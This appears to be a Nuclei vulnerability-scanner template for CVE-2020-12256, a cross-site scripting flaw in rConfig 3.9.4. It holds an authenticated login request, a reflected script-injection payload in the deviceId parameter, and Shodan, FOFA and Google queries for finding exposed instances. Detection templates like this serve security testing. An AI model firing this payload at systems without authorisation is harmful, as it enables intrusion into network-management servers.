2023-10-17 07:20:28 +00:00
id : CVE-2020-12256
2023-10-17 17:52:26 +00:00
2023-10-17 07:20:28 +00:00
info :
name : rConfig 3.9.4 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
reference :
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12256
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2020-12256
cwe-id : CWE-79
2023-10-18 16:26:30 +00:00
epss-score : 0.17512
2024-01-29 17:11:14 +00:00
epss-percentile : 0.95674
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : "true"
2023-10-17 17:52:26 +00:00
max-request : 3
vendor : rconfig
product : rconfig
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"rConfig"
- http.title:"rconfig"
2024-05-31 19:23:20 +00:00
fofa-query : title="rconfig"
google-query : intitle:"rconfig"
2023-10-17 07:20:28 +00:00
tags : cve,cve2020,rconfig,authenticated,xss
http :
- raw :
- |
GET /login.php HTTP/1.1
Host : {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
host-redirects : true
matchers :
- type : dsl
dsl :
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100c887a191fe2953da451bfd27b6e8864590d0984332de446adaa6fe860a5373030220243f19376a4a1b6b87f399da2a242737f0204a64bc0eeb66e6840e2a0671ef12:922c64590222798bb761d5b6d8e72950